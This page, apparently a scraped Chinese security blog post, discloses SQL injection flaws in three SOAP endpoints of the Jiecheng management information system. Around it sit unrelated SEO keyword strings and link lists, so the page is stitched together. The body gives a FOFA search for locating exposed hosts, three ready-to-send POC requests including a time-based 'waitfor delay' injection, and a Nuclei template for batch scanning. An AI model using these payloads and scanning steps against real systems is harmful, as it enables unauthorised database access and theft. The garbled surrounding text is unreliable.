当前位置: 首页 > news >正文

网站建设框架编写目的手机端h5网站模板下载

网站建设框架编写目的,手机端h5网站模板下载,西宁网站制作费用是多少钱,哪里可以找到做网站的免责声明#xff1a; 文章中涉及的漏洞均已修复#xff0c;敏感信息均已做打码处理#xff0c;文章仅做经验分享用途#xff0c;切勿当真#xff0c;未授权的攻击属于非法行为#xff01;文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直…免责声明 文章中涉及的漏洞均已修复敏感信息均已做打码处理文章仅做经验分享用途切勿当真未授权的攻击属于非法行为文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失均由使用者本人负责作者不为此承担任何责任一旦造成后果请自行负责 一漏洞描述 捷诚管理信息系统是一款功能全面可以支持自营、联营到外柜租赁的管理其自身带工作流管理工具能够帮助企业有效的开展内部审批工作。该产品CWSFinanceCommon.asmx、CWSHr.asmx、cwsoa.asmx多处接口存在SQL注入。 二漏洞影响版本 全版本 三网络空间测绘查询 fofa: body/Scripts/EnjoyMsg.js 四漏洞复现 POC1: POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1 Host: x.x.x.x User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36 Connection: close Content-Length: 369 Accept: */* Accept-Language: en Content-Type: text/xml; charsetutf-8 Accept-Encoding: gzip?xml version1.0 encodingutf-8? soap:Envelope xmlns:xsihttp://www.w3.org/2001/XMLSchema-instance xmlns:xsdhttp://www.w3.org/2001/XMLSchema xmlns:soaphttp://schemas.xmlsoap.org/soap/envelope/soap:BodyGetOSpById xmlnshttp://tempuri.org/sId1;waitfor delay 0:0:5--/sId/GetOSpById/soap:Body /soap:Envelope延时注入5秒 POC2 POST /EnjoyRMIS_WS/WS/Hr/CWSHr.asmx HTTP/1.1 Cache-Control: max-age0 Upgrade-Insecure-Requests: 1 Host: x.x.x.x User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,image/apng,*/*;q0.8,application/signed-exchange;vb3;q0.7 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q0.9 Connection: close SOAPAction: http://tempuri.org/GetLeaveReqById Content-Type: text/xml;charsetUTF-8 Content-Length: 316soapenv:Envelope xmlns:soapenvhttp://schemas.xmlsoap.org/soap/envelope/ xmlns:temhttp://tempuri.org/soapenv:Header/soapenv:Bodytem:GetLeaveReqById!--type: string--tem:sIdgero et/tem:sId/tem:GetLeaveReqById/soapenv:Body /soapenv:EnvelopePOC3: POST /EnjoyRMIS_WS/WS/POS/cwsoa.asmx HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0 Host: x.x.x.x![image.png](https://image.3001.net/images/20231122/1700631040_655d920042b6ad451a8e4.png!small) Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,*/*;q0.8 Accept-Language: zh-CN,zh;q0.8,zh-TW;q0.7,zh-HK;q0.5,en-US;q0.3,en;q0.2 Accept-Encoding: gzip, deflate, br Connection: close Upgrade-Insecure-Requests: 1 SOAPAction: http://tempuri.org/GetOAById Content-Type: text/xml;charsetUTF-8 Content-Length: 276soap:Envelope xmlns:soaphttp://www.w3.org/2003/05/soap-envelope xmlns:temhttp://tempuri.org/soap:Header/soap:Bodytem:GetOAById!--type: string--tem:sIdgero et/tem:sId/tem:GetOAById/soap:Body /soap:Envelope五批量验证 id: jiecheng-CWSFinanceCommon-sqliinfo:name: 捷诚管理信息系统 CWSFinanceCommon.asmx SQL注入漏洞author: fgzseverity: highdescription: 捷诚管理信息系统是一款功能全面可以支持自营、联营到外柜租赁的管理其自身带工作流管理工具能够帮助企业有效的开展内部审批工作。该系统CWSFinanceCommon.asmx 存在sql注入漏洞。黑客可以通过该漏洞获取数据库敏感信息甚至远控服务器。tags: 2023,jiecheng,sqlimetadata:max-request: 3fofa-query: body/Scripts/EnjoyMsg.jsverified: truehttp:- method: POSTpath:- {{BaseURL}}/EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmxheaders:Content-Type: text/xml; charsetutf-8body: ?xml version\1.0\ encoding\utf-8\?\nsoap:Envelope xmlns:xsi\\http://www.w3.org/2001/XMLSchema-instance\ xmlns:xsd\http://www.w3.org/2001/XMLSchema\\\ xmlns:soap\http://schemas.xmlsoap.org/soap/envelope/\\n soap:Body\n\\ GetOSpById xmlns\http://tempuri.org/\\n sId1;waitfor delay\\ 0:0:5--/sId\n /GetOSpById\n /soap:Body\n/soap:Envelopematchers:- type: dsldsl:- status_code 200 duration5 duration6六修复建议 联系厂家获取修复补丁。
http://www.zqtcl.cn/news/324930/

相关文章:

  • 自己给网站做支付接口wordpress elementor
  • 中国最新军事新闻网站优化推广
  • 有没有做3d衣服模型网站php网站开发目的
  • 东莞网站建设方案咨询wordpress易企秀
  • 漳诈网站建设免费的企业网站建设
  • 广州番禺区有什么好玩的地方优化软件有哪些
  • 面包机做面包网站wordpress获取用户注册时间
  • 福州网站建设个人兼职泰州seo排名扣费
  • 泰安北京网站建设公司个人自我介绍网页
  • 网站建设适应全屏如何自动深圳市哪里最繁华
  • 杭州网站推广公司阿里云wordpress 安装目录
  • 厦门优秀网站建设app项目开发流程
  • 工作设计室网站海外网站代理
  • 室内设计官方网站没网站怎么做cpa
  • 哪个网站做欧洲旅游攻略好wordpress编辑器字体大小
  • aspcms 手机网站wordpress 刷浏览量
  • dw网站首页的导航怎么做网站建设企业建站模板
  • 平台型网站建设网站关键词优化seo
  • 齿轮机械东莞网站建设技术支持热搜词排行榜关键词
  • 河南专业做网站网站推广优化c重庆
  • 温州网站建设钱建设工程公司网站
  • 做笑话网站全国大学生职业生涯规划大赛官网
  • 便宜购 网站建设平台推广引流怎么做
  • 怎么用记事本做钓鱼网站制作公司网页的步骤
  • 机械设备东莞网站建设智慧软文网站
  • 个人网站需不需要搭建服务器蘑菇短视频2023版特色功能
  • 网站建设公司是什么东兰县建设局网站
  • 网站优化排名方案软件发布网
  • 企业网站开发价钱低企业策划案例
  • 网站建设帐号网站导入页欣赏